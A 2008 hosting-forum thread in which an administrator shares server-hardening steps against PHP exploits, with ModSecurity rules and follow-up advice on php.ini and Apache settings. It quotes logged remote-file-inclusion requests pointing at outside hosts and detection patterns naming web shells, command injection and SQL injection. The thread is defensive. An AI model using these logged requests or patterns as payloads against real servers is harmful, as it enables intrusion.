Results 1 to 9 of 9
  1. #1
    Join Date
    Dec 2002
    Location
    USA
    Posts
    337

    Counter PHP Exploit Techniques

    Lately, our server logs are being filled with requests from exploited servers. In order to prevent our servers from being hacked, I have tried to harden the server as much as possible. (Server: Centos 4.6, Apache 2, PHP 5, MySql 5, Cpanel/WHM)

    I have detailed my efforts and would appreciate some feed back or suggestions of your own that have been effective.

    -------------

    Examples include c99.txt exploits, php insertions, etc.

    Recent Sample Logs:

    Code:
    66.246.246.38 - - [30/Jan/2008:16:32:59 -0500] "GET /example.cgi?SearchIndex=http%3A%2F%2Fwww.soeasywebsite.com%2Fsoeasycasino%2Fmaj%2Fpepus%2F&Manufacturer=Black+&+Decker HTTP/1.0" 406 442 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
    Code:
    64.38.19.90 - - [25/Jan/2008:04:35:22 -0500] "GET /post/index/7//bm/mail.php?id=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 406 464 "-" "libwww-perl/5.808"
    Code:
    207.44.154.126 - - [01/Feb/2008:01:36:12 -0500] "GET /index.php?act=http%3A%2F%2Fwww.qubestunes.com%2Fte%2Fratov%2Fomuley%2F&id=2 HTTP/1.0" 200 139303 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
    What to do to prevent these intrusions?

    1) I have updated my Mod_Security rules (running version modsec2) to include checks for the following:

    Code:
    # Check Content-Length and reject all non numeric ones
    SecRule REQUEST_HEADERS:Content-Length "!^\d+$" "deny,log,auditlog,msg:'Content-Length HTTP header is not numeric', severity:'2',id:'960016'"
    
    # Do not accept GET or HEAD requests with bodies
    SecRule REQUEST_METHOD "^(GET|HEAD)$" "chain,deny,log,auditlog,msg:'GET or HEAD requests with bodies', severity:'2',id:'960011'"
    SecRule REQUEST_HEADERS:Content-Length "!^0?$"
    
    # Require Content-Length to be provided with every POST request.
    SecRule REQUEST_METHOD "^POST$" "chain,deny,log,auditlog,msg:'POST request must have a Content-Length header',id:'960012',severity:'4'"
    SecRule &REQUEST_HEADERS:Content-Length "@eq 0"
    
    # Don't accept transfer encodings we know we don't know how to handle
    SecRule HTTP_Transfer-Encoding "!^$" "deny,log,auditlog,msg:'ModSecurity does not support transfer encodings',id:'960013',severity:'5'"
    
    # Check decodings
    SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES|REQUEST_HEADERS|!REQUEST_HEADERS:Referer "@validateUrlEncoding" \
    	"chain, deny,log,auditlog,msg:'URL Encoding Abuse Attack Attempt',id:'950107',severity:'4'"
    SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES|REQUEST_HEADERS|!REQUEST_HEADERS:Referer "\%(?![0-9a-fA-F]{2}|u[0-9a-fA-F]{4})"
    
    # Proxy access attempt
    SecRule REQUEST_URI ^http:/ "deny,log,auditlog,msg:'Proxy access attempt', severity:'2',id:'960014'"
    
    #
    # Restrict type of characters sent
    SecRule REQUEST_FILENAME|REQUEST_HEADERS_NAMES|REQUEST_HEADERS|!REQUEST_HEADERS:Referer \
    	"@validateByteRange 1-255" \
    	"log,auditlog,msg:'Request Missing an Accept Header', severity:'2',id:'960015',t:urlDecodeUni,phase:1"
    
    SecRule ARGS|ARGS_NAMES "@validateByteRange 1-255" \
    	"deny,log,auditlog,msg:'Invalid character in request',id:'960901',severity:'4',t:urlDecodeUni,phase:2"
    
    # allow request methods
    SecRule REQUEST_METHOD "!^((?:(?:POS|GE)T|OPTIONS|HEAD))$" \
        "phase:1,log,auditlog,msg:'Method is not allowed by policy', severity:'2',id:'960032'"
    
    
    # Restrict file extension
    # removed exe so that frontpage will work
    
    # Restricted HTTP headers 
    SecRule REQUEST_HEADERS_NAMES "\.(?:Lock-Token|Translate|If)$" \
        "deny,log,auditlog,msg:'HTTP header is restricted by policy',id:'960038',severity:'4'"
    
    SecRule HTTP_User-Agent "(?:\b(?:m(?:ozilla\/4\.0 \(compatible\)|etis)|webtrends security analyzer|pmafind)\b|n(?:-stealth|sauditor|essus|ikto)|b(?:lack ?widow|rutus|ilbo)|(?:jaascoi|paro)s|internet explorer|webinspect|\.nasl)" \
            "deny,log,auditlog,msg:'Request Indicates a Security Scanner Scanned the Site',id:'990002',severity:'2'"
    SecRule REQUEST_HEADERS_NAMES "\bacunetix-product\b" \
            "deny,log,auditlog,msg:'Request Indicates a Security Scanner Scanned the Site',id:'990901',severity:'2'"
    SecRule REQUEST_FILENAME "^/nessustest" \
            "deny,log,auditlog,msg:'Request Indicates a Security Scanner Scanned the Site',id:'990902',severity:'2'"
    
    SecRule REQUEST_HEADERS:User-Agent "(?:m(?:ozilla\/(?:4\.0 \(compatible; advanced email extractor|2\.0 \(compatible; newt activex; win32\))|ailto:craftbot\@yahoo\.com)|e(?:mail(?:(?:collec|harves|magne)t|(?: extracto|reape)r|siphon|wolf)|(?:collecto|irgrabbe)r|xtractorpro|o browse)|a(?:t(?:tache|hens)|utoemailspider|dsarobot)|w(?:eb(?:emailextrac| by mail)|3mir)|f(?:astlwspider|loodgate)|p(?:cbrowser|ackrat|surf)|(?:digout4uagen|takeou)t|(?:chinacla|be)[email protected]|rsync|shai|zeus)" \
            "deny,log,auditlog,msg:'Rogue web site crawler',id:'990012',severity:'2'"
    
    SecRule REQUEST_HEADERS:User-Agent "(?:\b(?:(?:indy librar|snoop)y|microsoft url control|lynx)\b|d(?:ownload demon|isco)|w(?:3mirror|get)|l(?:ibwww|wp)|p(?:avuk|erl)|cu(?:sto|rl)|big brother|autohttp|netants|eCatch)" \
            "chain,log,auditlog,msg:'Request Indicates an automated program explored the site',id:'990011',severity:'5'"
    SecRule REQUEST_HEADERS:User-Agent "!^apache.*perl"
    
    
    # Session fixation
    SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES|REQUEST_HEADERS|!REQUEST_HEADERS:Referer "(?:\.cookie\b.*?;\W*?(?:expires|domain)\W*?=|\bhttp-equiv\W+set-cookie\b)" \
            "capture,ctl:auditLogParts=+E,log,auditlog,msg:'Session Fixation. Matched signature <%{TX.0}>',id:'950009',severity:'2'"
    
    # Blind SQL injection
    SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES|REQUEST_HEADERS|!REQUEST_HEADERS:Referer "(?:\b(?:(?:s(?:ys\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\b.{0,40}\b(?:substring|ascii|user))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql.user)|c(?:onstraint_type|harindex)|attnotnull)\b|(?:locate|instr)\W+\()|\@\@spid\b)" \
            "capture,t:replaceComments,ctl:auditLogParts=+E,log,auditlog,msg:'Blind SQL Injection Attack. Matched signature <%{TX.0}>',id:'950007',severity:'2'"
    SecRule REQUEST_FILENAME|ARGS|REQUEST_HEADERS|!REQUEST_HEADERS:Referer "\b(?:(?:s(?:ys(?:(?:(?:process|tabl)e|filegroup|object)s|c(?:o(?:nstraint|lumn)s|at)|dba|ibm)|ubstr(?:ing)?)|user_(?:(?:(?:constrain|objec)t|tab(?:_column|le)|ind_column|user)s|password|group)|a(?:tt(?:rel|typ)id|ll_objects)|object_(?:(?:nam|typ)e|id)|pg_(?:attribute|class)|column_(?:name|id)|(?:dba|mb)_users|xtype\W+\bchar|rownum)\b|t(?:able_name\b|extpos\W+\())" \
            "capture,t:replaceComments,ctl:auditLogParts=+E,log,auditlog,msg:'Blind SQL Injection Attack. Matched signature <%{TX.0}>',id:'950904',severity:'2'"        
    
    # SQL injection
    SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES|REQUEST_HEADERS|!REQUEST_HEADERS:Referer "(?:\b(?:(?:s(?:elect\b(?:.{1,100}?\b(?:(?:length|count|top)\b.{1,100}?\bfrom|from\b.{1,100}?\bwhere)|.*?\b(?:d(?:ump\b.*\bfrom|ata_type)|(?:to_(?:numbe|cha)|inst)r))|p_(?:(?:addextendedpro|sqlexe)c|(?:oacreat|prepar)e|execute(?:sql)?|makewebtask)|ql_(?:longvarchar|variant))|xp_(?:reg(?:re(?:movemultistring|ad)|delete(?:value|key)|enum(?:value|key)s|addmultistring|write)|e(?:xecresultset|numdsn)|(?:terminat|dirtre)e|availablemedia|loginconfig|cmdshell|filelist|makecab|ntsec)|u(?:nion\b.{1,100}?\bselect|tl_(?:file|http))|group\b.*\bby\b.{1,100}?\bhaving|load\b\W*?\bdata\b.*\binfile|(?:n?varcha|tbcreato)r|autonomous_transaction|open(?:rowset|query)|dbms_java)\b|i(?:n(?:to\b\W*?\b(?:dump|out)file|sert\b\W*?\binto|ner\b\W*?\bjoin)\b|(?:f(?:\b\W*?\(\W*?\bbenchmark|null\b)|snull\b)\W*?\()|(?:having|or|and)\b\s+?(?:\d{1,10}|'[^=]{1,10}')\s*?[=<>]+|(?:print\]\b\W*?\@|root)\@|c(?:ast\b\W*?\(|oalesce\b))|(?:;\W*?\b(?:shutdown|drop)|\@\@version)\b|'(?:s(?:qloledb|a)|msdasql|dbo)')" \
            "capture,t:replaceComments,ctl:auditLogParts=+E,log,auditlog,msg:'SQL Injection Attack. Matched signature <%{TX.0}>',id:'950001',severity:'2'"
    SecRule REQUEST_FILENAME|ARGS|REQUEST_HEADERS|!REQUEST_HEADERS:Referer "\b(?:user_(?:(?:object|table|user)s|password|group)|a(?:tt(?:rel|typ)id|ll_objects)|object_(?:(?:nam|typ)e|id)|pg_(?:attribute|class)|column_(?:name|id)|substr(?:ing)?|table_name|mb_users|rownum)\b" \
            "capture,t:replaceComments,ctl:auditLogParts=+E,log,auditlog,msg:'SQL Injection Attack. Matched signature <%{TX.0}>',id:'950906',severity:'2'"
    
    # XSS
    SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES|REQUEST_HEADERS "(?:\b(?:on(?:(?:mo(?:use(?:o(?:ver|ut)|down|move|up)|ve)|key(?:press|down|up)|c(?:hange|lick)|s(?:elec|ubmi)t|(?:un)?load|dragdrop|resize|focus|blur)\b\W*?=|abort\b)|(?:l(?:owsrc\b\W*?\b(?:(?:java|vb)script|shell)|ivescript)|(?:href|url)\b\W*?\b(?:(?:java|vb)script|shell)|background-image|mocha):|type\b\W*?\b(?:text\b(?:\W*?\b(?:j(?:ava)?|ecma)script\b| [vbscript])|application\b\W*?\bx-(?:java|vb)script\b)|s(?:(?:tyle\b\W*=.*\bexpression\b\W*|ettimeout\b\W*?)\(|rc\b\W*?\b(?:(?:java|vb)script|shell|http):)|(?:c(?:opyparentfolder|reatetextrange)|get(?:special|parent)folder)\b|a(?:ctivexobject\b|lert\b\W*?\())|<(?:(?:body\b.*?\b(?:backgroun|onloa)d|input\b.*?\\btype\b\W*?\bimage)\b|!\[CDATA\[|script|meta)|(?:\.(?:(?:execscrip|addimpor)t|(?:fromcharcod|cooki)e|innerhtml)|\@import)\b)" \
            "capture,ctl:auditLogParts=+E,log,auditlog,msg:'Cross-site Scripting (XSS) Attack. Matched signature <%{TX.0}>',id:'950004',severity:'2'"
    
    # file injection
    SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES|REQUEST_HEADERS "(?:\b(?:\.(?:ht(?:access|passwd|group)|www_?acl)|global\.asa|httpd\.conf|boot\.ini)\b|\/etc\/)" \
            "capture,ctl:auditLogParts=+E,deny,log,auditlog,msg:'Remote File Access Attempt. Matched signature <%{TX.0}>',id:'950005',severity:'2'"
    
    # Command access
    SecRule REQUEST_FILENAME "\b(?:n(?:map|et|c)|w(?:guest|sh)|cmd(?:32)?|telnet|rcmd|ftp)\.exe\b" \
            "capture,ctl:auditLogParts=+E,deny,log,auditlog,msg:'System Command Access. Matched signature <%{TX.0}>',id:'950002',severity:'2'"
    
    # Command injection
    SecRule ARGS|ARGS_NAMES|REQUEST_HEADERS "(?:\b(?:(?:n(?:et(?:\b\W+?\blocalgroup|\.exe)|(?:map|c)\.exe)|t(?:racer(?:oute|t)|elnet\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\.exe|echo\b\W*?\by+)\b|c(?:md(?:(?:32)?\.exe\b|\b\W*?\/c)|d(?:\b\W*?[\\\/]|\W*?\.\.)|hmod.{0,40}?\+.{0,3}x))|[\;\|\`]\W*?\b(?:(?:c(?:h(?:grp|mod|own|sh)|md|pp|c)|p(?:asswd|ython|erl|ing|s)|n(?:asm|map|c)|f(?:inger|tp)|(?:kil|mai)l|(?:xte)?rm|ls(?:of)?|telnet|uname|echo|id)\b|g(?:\+\+|cc\b))|\/(?:c(?:h(?:grp|mod|own|sh)|pp|c)|p(?:asswd|ython|erl|ing|s)|n(?:asm|map|c)|f(?:inger|tp)|(?:kil|mai)l|g(?:\+\+|cc)|(?:xte)?rm|ls(?:of)?|telnet|uname|echo|id)(?:[\'\"\|\;\`\-\s]|$))" \
            "capture,ctl:auditLogParts=+E,deny,log,auditlog,msg:'System Command Injection. Matched signature <%{TX.0}>',id:'950006',severity:'2'"
    SecRule "ARGS|ARGS_NAMES|REQUEST_HEADERS|!REQUEST_HEADERS:User-Agent" \
    		"\bwget\b" \
            "capture,ctl:auditLogParts=+E,deny,log,auditlog,msg:'System Command Injection. Matched signature <%{TX.0}>',id:'950907',severity:'2'"
    
    # SSI injection
    SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES|REQUEST_HEADERS "<!--\W*?#\W*?(?:e(?:cho|xec)|printenv|include|cmd)" \
            "capture,ctl:auditLogParts=+E,deny,log,auditlog,msg:'SSI injection Attack. Matched signature <%{TX.0}>',id:'950011',severity:'2'"
    
    # PHP injection
    SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES|REQUEST_HEADERS "(?:(?:\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open)|\$_(?:(?:pos|ge)t|session))\b|<\?(?!xml))" \
            "capture,ctl:auditLogParts=+E,deny,log,auditlog,msg:'PHP Injection Attack. Matched signature <%{TX.0}>',id:'950013',severity:'2'"
    
    #suntzu
    SecRule REQUEST_URI|REQUEST_BODY|HTTP_Content-Disposition "/(suntzu.*|suntzu)\.php\?cmd="
    
    #Known rootkits
    SecRule REQUEST_URI|REQUEST_BODY "perl (xpl\.pl|kut|viewde|httpd\.txt)"
    SecRule REQUEST_URI|REQUEST_BODY "\./xkernel\;"
    SecRule REQUEST_URI|REQUEST_BODY "/kaiten\.c"
    SecRule REQUEST_URI|REQUEST_BODY "/mampus\?&(cmd|command)"
    
    # WEB-MISC .htpasswd access
    SecRule REQUEST_URI  "\.htpasswd" 
    
    # WEB-MISC /etc/passwd access
    SecRule REQUEST_URI  "/etc/passwd"
    
    #Exploit agent
    SecRule HTTP_User-Agent "Mosiac 1\.*"
    
    #remote bash shell
    SecRule REQUEST_URI "/shell\.php\&cmd="
    SecRule ARGS "/shell\.php\&cmd="
    
    # WEB-CGI formmail
    SecRule REQUEST_URI "/(formmail|mailform)(\x0a|\.pl\x0a)"
    
    #Invision Board ipchat.php file include
    SecRule REQUEST_URI "/hk/ipchat\.php*root_path*conf_global\.php"
    
    #Invision Power Board SQL injection
    SecRule REQUEST_URI "/hk/index\.php\?act=.*&max_results=.*&filter=.*&sort_order=.*&sort_key=.*&st=*(UNION|SELECT|DELETE|INSERT)"
    
    #Invision Gallery SQL Injection Vulnerabilities
    SecRule REQUEST_URI "/hk/index\.php" chain
    SecRule ARGS:comment "(select|grant|delete|insert|drop|do|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[A-Z|a-z|0-9|\*| ]+[[:space:]](from|into|table|database|index|view)"
    
    
    # TIKIWIKI
    SecRule REQUEST_URI  "/tiki-map.phtml\?mapfile=\.\./\.\./"
    
    #Wordpress shell injection Vulnerability
    SecRule  REQUEST_URI "/cache/user.*/.*\.php\?cmd=" "id:390064,rev:1,severity:2,msg:'JITP: Wordpress shell injection Vulnerability'"
    
    #Bad agent
    SecRule HTTP_User-Agent "Brutus/AET"
    
    #Web leaches
    SecRule HTTP_User-Agent "Linux"
    SecRule HTTP_User-Agent "libcurl-agent"
    SecRule HTTP_User-Agent "TurnitinBot"
    SecRule HTTP_User-Agent "ANONYMOUS"
    SecRule HTTP_User-Agent "LinkWalker"
    SecRule HTTP_User-Agent "Drecombot"
    SecRule HTTP_User-Agent "Mac Finder"
    SecRule HTTP_User-Agent "ConveraCrawler"
    SecRule HTTP_User-Agent "WebarooBot"
    SecRule HTTP_User-Agent "RufusBot"
    SecRule HTTP_User-Agent "SumeetBot"
    SecRule HTTP_User-Agent "pulseBot"
    SecRule HTTP_User-Agent "FyberSpider"
    SecRule HTTP_User-Agent "1-More Scanner v1.25"
    SecRule HTTP_User-Agent "DRT-ResolveBot-Ignore"
    SecRule HTTP_User-Agent "T-H-U-N-D-E-R-S-T-O-N-E"
    SecRule HTTP_User-Agent "SnapPreviewBot"
    SecRule HTTP_User-Agent "IRLbot"
    SecRule HTTP_User-Agent "Charlotte"
    SecRule HTTP_User-Agent "ninetowns"
    SecRule HTTP_User-Agent "heritrix"
    SecRule HTTP_User-Agent "Python-urllib"
    SecRule HTTP_User-Agent "InetURL"
    SecRule HTTP_User-Agent "cazoodle"
    SecRule HTTP_User-Agent "DepSpid" "deny,nolog,status:410"
    SecRule HTTP_User-Agent "Browsezilla"
    SecRule HTTP_User-Agent "MetagerBot"
    SecRule HTTP_User-Agent "TALWinHttpClient"
    SecRule HTTP_User-Agent "Snapbot"
    SecRule HTTP_User-Agent "BDFetch"
    SecRule HTTP_User-Agent "WebaltBot"
    SecRule HTTP_User-Agent "VSynCrawler"
    SecRule HTTP_User-Agent "UbiCrawler"
    SecRule HTTP_User-Agent "WebCapture"
    SecRule HTTP_User-Agent "WebCopier"
    SecRule HTTP_User-Agent "FairAd Client"
    SecRule HTTP_User-Agent "Black Hole"
    SecRule HTTP_User-Agent "Crescent"
    SecRule HTTP_User-Agent "MIIxpc"
    SecRule HTTP_User-Agent "Harvest"
    SecRule HTTP_User-Agent "LinkextractorPro"
    SecRule HTTP_User-Agent "Snoopy"
    SecRule HTTP_User-Agent "IDBot"
    SecRule HTTP_User-Agent "Cyveillance" "deny,nolog,status:404"
    SecRule HTTP_User-Agent "PEAR HTTP_Request class"
    SecRule HTTP_User-Agent "libwww-perl"
    SecRule HTTP_User-Agent "Exabot"
    SecRule HTTP_User-Agent "NeuralBot/0\.2"
    SecRule HTTP_User-Agent "Kenjin Spider"
    SecRule HTTP_User-Agent "CopyRightCheck" "deny,nolog,status:404"
    SecRule HTTP_User-Agent "grub-client"
    SecRule HTTP_User-Agent "Web Downloader"
    SecRule HTTP_User-Agent "WebZIP"
    SecRule HTTP_User-Agent "WebPix"
    SecRule HTTP_User-Agent "WebCopier"
    SecRule HTTP_User-Agent "Webster"
    SecRule HTTP_User-Agent "WebZIP"
    SecRule HTTP_User-Agent "WebRipper"
    SecRule HTTP_User-Agent "WebStripper"
    SecRule HTTP_User-Agent "WebReaper"
    SecRule HTTP_User-Agent "HTTrack"
    SecRule HTTP_User-Agent "furl"
    SecRule HTTP_User-Agent "blackspider"
    SecRule HTTP_User-Agent "teleport pro"
    SecRule HTTP_User-Agent "combine"
    SecRule HTTP_User-Agent "Black Hole"
    SecRule HTTP_User-Agent "Attributor"
    SecRule HTTP_User-Agent "larbin"
    SecRule HTTP_User-Agent "jakarta"
    SecRule HTTP_User-Agent "LinkextractorPro"
    SecRule HTTP_User-Agent "SiteSnagger"
    SecRule HTTP_User-Agent "Schmozilla"
    SecRule HTTP_User-Agent "ProWebWalker"
    SecRule HTTP_User-Agent "LiteFinder"
    SecRule HTTP_User-Agent "CheeseBot"
    SecRule HTTP_User-Agent "Morfeus"
    SecRule HTTP_User-Agent "Teleport"
    SecRule HTTP_User-Agent "TMCrawler"
    SecRule HTTP_User-Agent "NetZIP"
    SecRule HTTP_User-Agent "Twiceler"
    SecRule HTTP_User-Agent "Nutscrape"
    SecRule HTTP_User-Agent "RedCarpet"
    SecRule HTTP_User-Agent "Nutch"
    SecRule HTTP_User-Agent "EmeraldShield.com"
    SecRule HTTP_User-Agent "Indy Library"
    SecRule HTTP_User-Agent "iCCrawler"
    SecRule HTTP_User-Agent "Attributor"
    SecRule HTTP_User-Agent "Nessus"
    SecRule HTTP_User-Agent "BecomeBot"
    SecRule HTTP_User-Agent "DiamondBot"
    SecRule HTTP_User-Agent "IWAgent"
    SecRule HTTP_User-Agent "BrightCrawler"
    SecRule HTTP_User-Agent "ia_archiver" "deny,nolog,status:404"
    SecRule HTTP_User-Agent "WWW-Mechanize"
    
    #some broken attack program
    SecRule REQUEST_URI|REQUEST_BODY "PUT /.*_@@RNDSTR@@"
    SecRule REQUEST_URI|REQUEST_BODY "soeasywebsite\.com"
    
    #bandwidth consumers
    SecRule HTTP_User-Agent "CopyRightCheck" "deny,nolog,status:404"
    SecRule HTTP_User-Agent "CopyGuard" "deny,nolog,status:404"
    SecRule HTTP_User-Agent "Picscout" "deny,nolog,status:404"
    SecRule HTTP_User-Agent "Digimarc WebReader" "deny,nolog,status:404"
    
    #spam bots
    SecRule HTTP_User-Agent  "DTS Agent"
    SecRule HTTP_User-Agent  "POE-Component-Client"
    SecRule HTTP_User-Agent  "WISEbot"
    SecRule HTTP_User-Agent  "^Shockwave Flash"
    SecRule HTTP_User-Agent  "Missigua"
    SecRule HTTP_User-Agent  "Java"
    
    #Gigablast
    SecRule HTTP_User-Agent "Gigabot" "deny,nolog,status:410"
    
    #e-mail collectors and spammers
    SecRule HTTP_User-Agent "WebBandit"
    SecRule HTTP_User-Agent "WEP Search 0"
    SecRule HTTP_User-Agent "Wells Search II"
    SecRule HTTP_User-Agent "psycheclone"
    SecRule HTTP_User-Agent "WEBMOLE"
    SecRule HTTP_User-Agent "Telesoft*"
    SecRule HTTP_User-Agent "WebEMailExtractor"
    SecRule HTTP_User-Agent "CherryPicker*"
    SecRule HTTP_User-Agent "NICErsPRO"
    SecRule HTTP_User-Agent "Advanced Email Extractor*"
    SecRule HTTP_User-Agent "EmailSiphon"
    SecRule HTTP_User-Agent "Extractorpro"
    SecRule HTTP_User-Agent "webbandit"
    SecRule HTTP_User-Agent "EmailCollector"
    SecRule HTTP_User-Agent "lwp-trivial"
    SecRule HTTP_User-Agent "WebEMailExtrac*"
    SecRule HTTP_User-Agent "EmailWolf"
    SecRule HTTP_User-Agent  "autoemailspider"
    SecRule HTTP_User-Agent  "EasyDL"
    SecRule HTTP_User-Agent  "ecollector"
    SecRule HTTP_User-Agent  "grub crawler"
    SecRule HTTP_User-Agent  "PycURL"
    SecRule HTTP_User-Agent  "DynaWeb"
    SecRule HTTP_User-Agent  "User-Agent"
    
    #bad referrers
    #SecRule HTTP_Referer|ARGS "customers\.brandimensions\.com" "deny,nolog,status:410"
    SecRule HTTP_Referer|ARGS "brandimensions\.com" "deny,nolog,status:410"
    SecRule HTTP_Referer|ARGS "Webclipping\.com" "deny,nolog,status:410"
    SecRule HTTP_Referer|ARGS "cwrank\.com"
    SecRule HTTP_Referer|ARGS "hanzoweb\.com"
    SecRule HTTP_Referer|ARGS "exevior\.com"
    SecRule HTTP_Referer|ARGS "netshaq\.com"
    SecRule HTTP_Referer|ARGS "xomreviews\.com
    SecRule HTTP_Referer|ARGS "ufoseek\.com"
    SecRule HTTP_Referer|ARGS "everyfeed\.com"
    SecRule HTTP_Referer|ARGS "hanzoweb\.com"
    SecRule HTTP_Referer|ARGS "mysubject\.com"
    SecRule HTTP_Referer|ARGS "internetserviceteam\.com"
    SecRule HTTP_Referer|ARGS "site\.com"
    
    # Email Injection
    SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES "[\n\r]\s*(?:to|bcc|cc)\s*:.*?\@" \
            "t:none,t:lowercase,capture,ctl:auditLogParts=+E,deny,log,auditlog,status:501,msg:'Email Injection Attack. Matched signature <%{TX.0}>',id:'950019',severity:'2'"
    
    #new kit
    SecRule REQUEST_URI   "/c99shell\.txt"
    SecRule REQUEST_URI   "/c99\.txt\?"
    
    #remote bash shell
    SecRule REQUEST_URI "/shell\.php\&cmd="
    SecRule ARGS "/shell\.php\&cmd="
    
    #c99 rootshell
    SecRule REQUEST_URI "\.php\?act=(chmod&f|cmd|f&f=|ls|img&img=)"
    
    SecRule REQUEST_URI "/r57en\.php"
    
    #generic shell
    SecRule REQUEST_URI "shell\.txt"
    
    #Known rootkit Defacing Tool 2.0
    SecRule REQUEST_URI "/tool(12)?[0-9]?\.(d(ao)t|gif|jpe?g|bmp|txt|png|asp)\?&?(cmd|command)="
    SecRule REQUEST_URI "/tool\.(d(ao)t|gif|jpe?g|bmp|txt|png|asp)\?&?(cmd|command)="
    SecRule REQUEST_URI "/tool25\.(d(ao)t|gif|jpe?g|bmp|txt|png|asp)\?&?(cmd|command)="
    SecRule REQUEST_URI "/therules25\.(d(ao)t|gif|jpe?g|bmp|txt|png|asp)\?&?(cmd|command)="
    
    #Generic remote perl execution with .pl extension
    SecRule REQUEST_URI "\;(\s|\t)*perl .*\.pl"
    
    #New SEL attack seen
    SecRule REQUEST_URI|REQUEST_BODY "select.*from.*information_schema\.tables"
    
    #New SQL attack seen
    SecRule REQUEST_URI "and.+char\(.*\).+user.+char\(.*\)"
    2) I have contacted the ISP's at there abuse@ email addreses. I don't know how seriously some of these companies take these notices but I it may help the webmaster to know his server is exploited.

    3) I secured my /tmp etc/fstab

    a) Ran the command secure/tmp
    b) added the following to etc/fstab

    Code:
    none 			   /dev/shm 			tmpfs 	 noexec,nosuid   0 0
    4) Using the CSF firewall and Mailscanner.

    5) Locked down the PHP variables.

    Check php for enable_dl
    Check php for disable_functions
    Check php for register_globals
    Check php open_basedir protection

    6) Keep Apache, MySql, PHP up to date.

    7) Changed SSH from password to a SSH Key with strong passphrase. Changed SSH port from 22 to another port.

    8) Installed nobody_check to automatically kill malicious processes

    9) Installed Rkhunter and Chkrootkit

    10) Disable unneeded server services.

    Check server startup for cups
    Check server startup for xfs
    Check server startup for atd
    Check server startup for nfslock
    Check server startup for canna
    Check server startup for FreeWnn
    Check server startup for cups-config-daemon
    Check server startup for iiim
    Check server startup for mDNSResponder
    Check server startup for nifd
    Check server startup for rpcidmapd
    Check server startup for bluetooth
    Check server startup for anacron
    Check server startup for gpm
    Check server startup for saslauthd
    Check server startup for avahi-daemon
    Check server startup for avahi-dnsconfd
    Check server startup for hidd
    Check server startup for pcscd
    Check server startup for sbadm
    Check server startup for webmin

    11) Review my logs daily to look for problem child scrapers, hackers, and issues.
    Last edited by Frontpage1; 02-01-2008 at 03:51 PM.

  2. #2

    Excellent Post

    We recently startedreceiving similar attacks.

    Excellent information! Many thanks!

    Thomas

  3. #3
    Join Date
    Dec 2002
    Location
    USA
    Posts
    337
    Your welcome. I am glad some one found my post useful.

  4. #4
    One thing I don't see mentioned, and you didn't specify a specific PHP5 minor version, so I am suggesting it here just in case.

    allow_url_fopen = Off in php.ini

    PHP 5.2 comes with another setting that probably protects things a little bit more:

    allow_url_include = Off (default is off)

    I turn this setting off on any server I am asked to secure. Yes it can cause some problems for _some_ php scripts, but most of them have been custom written applications, so I can get the developer to use curl functions instead.

    Turning this off will help out greatly, as it prevents most of the more common script kiddie tricks.

    I think mod_security is a nice idea, but implements things in the wrong method (reactive versus proactive -- think default deny), and I generally don't use it as I have seen a fair amount of false positives in production (for some more "generic" rule sets.

    One other thing I don't see you mention is turning off additional server information:

    ServerTokens Prod (in apache's httpd.conf)

    That turns off all the minor versions and other things that a hacker could use to to specifically target your server. The less information you provide, the better.

    Other than those... an excellent write up with some great information.
    Last edited by ExpressColo-TomW; 02-10-2008 at 11:06 PM.
    ExpressHosting.net - Fast. Reliable. Affordable.
    Shared Hosting | Dedicated Servers | Colocation | Managed Cloud | AS53255

  5. #5
    Join Date
    Dec 2002
    Location
    USA
    Posts
    337
    Yep.

    Forgot to mention those you stated.

    1) Edit your httpd.conf file and shut off server tokens.

    ServerSignature Off
    ServerTokens Prod
    The first one, ServerSignature Off tells apache not to display the server version on error pages, or other pages it generates.

    The second one ServerTokens Prod tells apache to only return Apache in the Server header, returned on every page request.

    Below is my updated Modsecurity2 config file. Please note that the useragent "Linux" is tagged as we get alot of scrappers/hackers that use it. However, there are legitimate users that have Linux in their useragent field, so if you need to, comment it out.

    Example Linux Useragents:

    Code:
    Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7) Gecko/20040624 Galeon/1.3.15 (Debian package 1.3.15-3)
    Code:
    Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.12) Gecko/20080207 Ubuntu/7.10 (gutsy) Firefox/2.0.0.12

    Code:
    # Check Content-Length and reject all non numeric ones
    SecRule REQUEST_HEADERS:Content-Length "!^\d+$" "deny,log,auditlog,msg:'Content-Length HTTP header is not numeric', severity:'2',id:'960016'"
    
    # Do not accept GET or HEAD requests with bodies
    SecRule REQUEST_METHOD "^(GET|HEAD)$" "chain,deny,log,auditlog,msg:'GET or HEAD requests with bodies', severity:'2',id:'960011'"
    SecRule REQUEST_HEADERS:Content-Length "!^0?$"
    
    # Require Content-Length to be provided with every POST request.
    SecRule REQUEST_METHOD "^POST$" "chain,deny,log,auditlog,msg:'POST request must have a Content-Length header',id:'960012',severity:'4'"
    SecRule &REQUEST_HEADERS:Content-Length "@eq 0"
    
    # Don't accept transfer encodings we know we don't know how to handle
    SecRule HTTP_Transfer-Encoding "!^$" "deny,log,auditlog,msg:'ModSecurity does not support transfer encodings',id:'960013',severity:'5'"
    
    # Check decodings
